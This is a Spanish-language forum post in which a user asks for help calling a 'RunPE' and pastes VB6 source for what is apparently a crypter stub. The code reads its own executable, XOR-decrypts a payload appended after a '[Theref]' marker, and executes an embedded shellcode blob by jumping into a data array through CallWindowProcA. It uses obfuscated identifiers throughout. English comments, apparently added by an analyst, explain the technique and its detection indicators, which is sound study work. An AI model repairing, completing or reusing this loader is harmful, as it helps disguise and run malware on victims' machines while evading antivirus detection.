Título: ayuda con llamar runpe Publicado por: mirkosenior en 6 Junio 2014, 12:06 pm hola a todos
¿Cómo puedo llamar a este runpe? ¿Alguien puede decirme dónde está el error?

' Analyst summary of the listing below (VB6), based only on what the code shows:
'   1. Sub Main reads the program's own .exe from disk and splits it on the
'      literal marker "[Theref]".
'   2. The second field is transformed with the third field as key by a
'      repeating-key XOR routine (labelled "RC4" by the author).
'   3. eseguiPE passes the address of a Currency array to CallWindowProc as if
'      it were a window procedure, so the API transfers control to the raw
'      bytes stored in that array.
' Static indicators visible here: the "[Theref]" marker inside the file, data
' appended after the normal end of the executable, and an import of
' CallWindowProcA whose first argument comes from VarPtr() of a data array.

' Entry point: loads the running executable's own image and extracts the
' fields embedded in it.
Sub Main()
    Dim AAAA As String
    ' Full path of the running executable, built from App.Path and App.EXEName.
    AAAA = App.Path & "\" & App.EXEName & ".exe"
    Dim BBBB As String
    ' Read the whole file into a string: the buffer is pre-sized to the file
    ' length (LOF) and filled by a single binary Get.
    Open AAAA For Binary As #1
    BBBB = Space(LOF(1))
    Get #1, , BBBB
    Close #1
    Dim sData() As String
    ' Fields are delimited by the literal "[Theref]". Index 0 is everything
    ' before the first marker; indexes 1 and 2 are used below as data and key.
    sData() = Split(BBBB, "[Theref]")
    ' The key (sData(2)) is stored in the same file as the data it protects,
    ' so an analyst holding the sample can reverse this step offline.
    sData(1) = ¥¶V«baDJØǬpRÆRQSgfâdãqG(sData(1), sData(2))
    ' Hands the transformed field and the ANSI-converted path of this
    ' executable to a routine named runpe.
    Call runpe(sData(1), StrConv(App.Path + "\" + App.EXEName + ".exe", vbFromUnicode))
End Sub

'RC4
' NOTE(review): despite the label above, this is not RC4. There is no state
' array and no key schedule; each data byte is XORed with the key byte at a
' wrapping index (repeating-key XOR). Applying it twice with the same key
' returns the input.
' Identifiers are machine-generated; reading aid:
'   first parameter  = data string, second parameter = key string
'   WESc...  = data bytes        Diª...  = key bytes
'   ôSÈ...   = data index        úZc...  = key index
'   YYq...   = last data index   ØPê...  = last key index
' Returns the transformed data converted back to a VB string.
Function ¥¶V«baDJØǬpRÆRQSgfâdãqG(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh As String, b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc As String) As String
    Dim DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() As Byte
    Dim WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() As Byte
    Dim ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ As Long
    Dim úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® As Long
    Dim YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ As Long
    Dim ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã As Long
    ' Convert both strings to byte arrays (vbFromUnicode) so the XOR works on
    ' single bytes.
    WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() = StrConv(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh, vbFromUnicode)
    DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() = StrConv(b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc, vbFromUnicode)
    YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ = UBound(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E)
    ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã = UBound(DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj)
    ' Walk every data byte; both indexes start at 0 (Long default).
    Do Until ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ > YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ
        WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) = WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) Xor DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj(úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY®)
        úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® + 1
        ' Wrap the key index once it passes the last key byte.
        If úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® > ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã Then úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = 0
        ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ = ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ + 1
    Loop
    ' The key bytes are released before the result is produced.
    Erase DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj
    ¥¶V«baDJØǬpRÆRQSgfâdãqG = StrConv(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E, vbUnicode)
    Erase WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E
End Function

'RUNPE
' user32 API normally used to forward a window message to a previous window
' procedure. Here every parameter is declared as a plain Long, so any address
' can be supplied as lpPrevWndFunc.
Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long

' Fills a Currency array with fixed values and has CallWindowProc call the
' start of that array as code.
'   data()             - byte array; the address of its first element is
'                        passed in the hWnd slot.
'   Ptr_To_Inject      - passed through unchanged in the Msg slot.
'   CommandlineEnabled - passed through unchanged in the wParam slot.
' Returns whatever CallWindowProc returns.
' What the embedded bytes do cannot be determined from this listing without
' disassembling them; the parameter names and the "RUNPE" label are the
' author's own description.
Private Function eseguiPE(ByRef data() As Byte, ByVal Ptr_To_Inject As Long, ByVal CommandlineEnabled As Long) As Long
    ' 122 Currency elements (indexes 0..121). Currency is an 8-byte type, so
    ' the literals below are a compact way to store an opaque byte blob in
    ' source form; no individual value is meaningful as a number.
    Dim Asm(121) As Currency
    Asm(0) = 400681687.6885@
    Asm(1) = -476253789078555.0612@
    Asm(2) = 169590654935207.5756@
    Asm(3) = 850533864474419.4055@
    Asm(4) = 737729641913629.2885@
    Asm(5) = 241583047782310.0933@
    Asm(6) = 24366994722224.3183@
    Asm(7) = -5591197446420.7926@
    Asm(8) = 909185617598340.8258@
    Asm(9) = -19175285449154.725@
    Asm(10) = -74963712694652.2037@
    Asm(11) = 364813893865675.1812@
    Asm(12) = 417268265771289.998@
    Asm(13) = -4467533218940.2859@
    Asm(14) = 341408918860883.873@
    Asm(15) = 24329165641253.0572@
    Asm(16) = -704495800380865.7131@
    Asm(17) = 374040769202653.0293@
    Asm(18) = 132891045878384.5141@
    Asm(19) = 330853606455412.8782@
    Asm(20) = -18546831736735.2555@
    Asm(21) = 319791640719971.9498@
    Asm(22) = 908565053235531.3645@
    Asm(23) = 204495311115001.8554@
    Asm(24) = -854751321242618.2143@
    Asm(25) = -74261121419612.3536@
    Asm(26) = -853017920184789.9651@
    Asm(27) = 853018044985278.6574@
    Asm(28) = 11660982868296.5087@
    Asm(29) = -644057630032745.1903@
    Asm(30) = 389428549114434.7534@
    Asm(31) = -76145685875174.3891@
    Asm(32) = -74907416031185.4908@
    Asm(33) = 494446016607881.1334@
    Asm(34) = 373919167982197.785@
    Asm(35) = -702326214173594.214@
    Asm(36) = 852984839970549.146@
    Asm(37) = 878491366656617.7029@
    Asm(38) = 11660149244069.3242@
    Asm(39) = -644057520081529.9839@
    Asm(40) = 852992269963661.735@
    Asm(41) = 118191623639287.4757@
    Asm(42) = -61508987237432.1588@
    Asm(43) = 683482598548397.6903@
    Asm(44) = -602576477534616.4219@
    Asm(45) = 312616265869225.0362@
    Asm(46) = 823209967166017.4093@
    Asm(47) = 242250886584983.6374@
    Asm(48) = 855453146203670.4029@
    Asm(49) = -79066168407783.6283@
    Asm(50) = -566073494675362.3812@
    Asm(51) = 707480649289074.6628@
    Asm(52) = -637454398289603.5604@
    Asm(53) = 244386299675628.5445@
    Asm(54) = -815078417416403.5827@
    Asm(55) = -18879051943875.1995@
    Asm(56) = -822123707815930.6686@
    Asm(57) = -18434021046527.2954@
    Asm(58) = 912451606937402.8942@
    Asm(59) = -644057520081529.9756@
    Asm(60) = 736754098641473.959@
    Asm(61) = 417322719301766.6436@
    Asm(62) = 907260734372726.4513@
    Asm(63) = 853017967675867.3294@
    Asm(64) = 11660982865150.7807@
    Asm(65) = -854635987033189.5019@
    Asm(66) = 417315068676156.9237@
    Asm(67) = -704495800377680.6639@
    Asm(68) = 244384539136657.2125@
    Asm(69) = -815078417416403.5827@
    Asm(70) = 364126617392252.4421@
    Asm(71) = 853022663170544.6404@
    Asm(72) = -855129000041499.1355@
    Asm(73) = 853017946071693.9733@
    Asm(74) = 244396803451753.601@
    Asm(75) = -535694978088672.9971@
    Asm(76) = 853017945341749.0318@
    Asm(77) = 850597150951837.7055@
    Asm(78) = -693956410164477.1442@
    Asm(79) = 392299672072137.6649@
    Asm(80) = -75273081301284.3259@
    Asm(81) = 233670410612668.8112@
    Asm(82) = 232135816315923.5976@
    Asm(83) = 282468056240967.6881@
    Asm(84) = -701595207746232.5423@
    Asm(85) = 173478023424630.523@
    Asm(86) = -838890426140287.6832@
    Asm(87) = 137505075359453.7978@
    Asm(88) = 238303243668856.6869@
    Asm(89) = 15754679864024.2693@
    Asm(90) = 137137957478099.5152@
    Asm(91) = 223974408162476.2226@
    Asm(92) = -853018149249239.2854@
    Asm(93) = 609147958724062.3211@
    Asm(94) = 187716700156924.5176@
    Asm(95) = 29051557366465.6234@
    Asm(96) = 180486733836584.4849@
    Asm(97) = -853018043593043.5209@
    Asm(98) = 230703534374533.4347@
    Asm(99) = 138151919766295.2044@
    Asm(100) = -863941699156868.1112@
    Asm(101) = 382501322004887.7562@
    Asm(102) = 217671250279223.4602@
    Asm(103) = -858396642110759.3865@
    Asm(104) = 382501330594822.3482@
    Asm(105) = 217671250279223.4602@
    Asm(106) = -860029196975681.1913@
    Asm(107) = 22128918341666.201@
    Asm(108) = 129708668231386.2504@
    Asm(109) = 138421474714790.2981@
    Asm(110) = 273938087394568.7415@
    Asm(111) = -703427576466491.6105@
    Asm(112) = 368089803424522.0018@
    Asm(113) = 273936330801683.6989@
    Asm(114) = -703427576466491.6105@
    Asm(115) = 382501322232107.5439@
    Asm(116) = 224650062758754.033@
    Asm(117) = -802975918546864.1941@
    Asm(118) = 261111522452255.6862@
    Asm(119) = 35367660677206.1368@
    Asm(120) = 848492795353964.3185@
    Asm(121) = 5.0164@
    'Put Here the shellcode
    ' VarPtr(Asm(0)) is the address of the array's first byte; supplying it as
    ' lpPrevWndFunc makes CallWindowProc jump into the array. This call is the
    ' point to watch when monitoring or hunting for the technique: a
    ' CallWindowProcA target that lies in a data region rather than in a
    ' loaded module's code section.
    eseguiPE = CallWindowProc(VarPtr(Asm(0)), VarPtr(data(0)), Ptr_To_Inject, CommandlineEnabled, 0)
End Function